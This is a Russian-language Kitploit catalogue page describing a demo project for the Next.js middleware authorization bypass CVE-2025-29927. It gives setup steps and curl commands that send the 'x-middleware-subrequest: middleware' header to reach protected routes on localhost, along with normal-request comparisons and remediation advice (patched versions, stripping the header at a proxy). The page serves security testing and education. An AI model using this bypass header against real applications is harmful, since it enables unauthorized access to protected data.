Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
claude-create-CVE-2025-29927 — Проверяет и демонстрирует CVE-2025-29927 — обход авторизации в middleware Next.js. Включает скрипты для эксплуатации уязвимости и проверки обычного доступа, а также рекомендации по устранению. | Kitploit
Инструменты/GitHubGitHub/maronnjapan/claude-create-cve-2025-29927
Анализ уязвимостейЭксплуатация веб-приложенийВеб-безопасностьОбучение и Образование
GitHubmaronnjapan/claude-create-cve-2025-29927

claude-create-CVE-2025-29927

Проверяет и демонстрирует CVE-2025-29927 — обход авторизации в middleware Next.js. Включает скрипты для эксплуатации уязвимости и проверки обычного доступа, а также рекомендации по устранению.

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
1 год назадЕщё не проверено

Инструмент для тестирования уязвимости middleware Next.js (CVE-2025-29927)

Это приложение демонстрирует уязвимость обхода авторизации в middleware Next.js (CVE-2025-29927).

Об уязвимости

CVE-2025-29927 — это уязвимость обхода авторизации в middleware Next.js. Отправляя специально сформированный HTTP-заголовок (x-middleware-subrequest), злоумышленник может обойти проверки авторизации, реализованные в middleware, и потенциально получить доступ к защищённым ресурсам.

Инструкции по установке

  1. Установите зависимости:

    root@kitploit:~
    cd /var/www/react-nextjs/test-middleware-skip
    npm install
    
  2. Запустите сервер разработки:

    root@kitploit:~
    npm run dev
    
  3. Сервер запустится на http://localhost:3000

Тестирование уязвимости

Обычный доступ (должен быть заблокирован)

Попробуйте обычным способом получить доступ к защищённому маршруту:

root@kitploit:~
npm run test-normal

или

root@kitploit:~
curl -v http://localhost:3000/protected-data

Вы должны получить ответ 401 Unauthorized, поскольку middleware блокирует доступ.

Эксплуатация уязвимости

Попробуйте получить доступ к защищённому маршруту с эксплуатирующим заголовком:

root@kitploit:~
npm run test-exploit

или

root@kitploit:~
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/protected-data

Если приложение уязвимо, вы получите ответ 200 OK с защищёнными данными.

Тестирование API-маршрута

Обычный доступ (должен быть заблокирован):

root@kitploit:~
curl -v http://localhost:3000/api/protected

С эксплойтом:

root@kitploit:~
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected

Устранение уязвимости

Чтобы исправить эту уязвимость, вам следует:

  1. Обновите Next.js до исправленной версии:

    • Next.js 15.x: обновитесь до 15.2.3 или новее
    • Next.js 14.x: обновитесь до 14.2.25 или новее
    • Next.js 13.x: обновитесь до 13.5.9 или новее
    • Next.js 12.x: обновитесь до 12.3.5 или новее
  2. Если вы не можете обновиться, настройте обратный прокси-сервер (например, Nginx или Cloudflare), который будет удалять заголовок x-middleware-subrequest из входящих запросов.

Дополнительные команды для тестирования

Проверьте, уязвим ли API-маршрут:

root@kitploit:~
# Normal request (should be blocked)
curl -v http://localhost:3000/api/protected

# With exploit header
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected

Отказ от ответственности

Этот инструмент предоставляется исключительно в образовательных целях и для тестирования безопасности. Используйте его, чтобы проверить, уязвимы ли ваши собственные приложения Next.js и требуют ли они обновления.

Скачать инструмент